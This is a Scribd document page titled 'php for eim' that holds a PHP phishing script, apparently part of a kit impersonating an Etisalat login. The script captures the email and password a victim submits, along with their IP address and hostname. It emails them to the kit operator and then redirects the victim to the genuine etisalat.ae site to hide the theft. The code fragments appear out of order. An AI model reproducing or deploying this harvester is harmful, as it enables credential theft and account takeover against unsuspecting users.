0% found this document useful (0 votes)
16 views

php for eim

Uploaded by

kennetsmith0
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
0% found this document useful (0 votes)
16 views

php for eim

Uploaded by

kennetsmith0
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
You are on page 1/ 1

"Email : ".$_POST['email'].

"\n";
$message .= "Password : ".$_POST['password']."\n";
$message .= "Date: ".$adddate."\n";
$message .= "Host: ".$host."\n";
$message .= "------------- Created By JambaDaddy ---------------\n";
$recipient = "[email protected]";
$subject = "Email Eim $ip";
$from = "[email protected]";
$headers .= $_POST['$host']."\n";
$headers .= "MIME-Version: 1.0\n";
$headers = "From: $from\r\n";
if (mail($recipient,$subject,$message,$headers))
{
header("Location: https://www.etisalat.ae/en/index.html");

}
else
{
echo "ERROR! Please go back and try again.";
}

?><?

$adddate=date("D M d, Y g:i a");


$ip = getenv("REMOTE_ADDR");
$host = gethostbyaddr($_SERVER['REMOTE_ADDR']);
$message .= "--------------Eim Login Info-----------------------\n";
$message .=

You might also like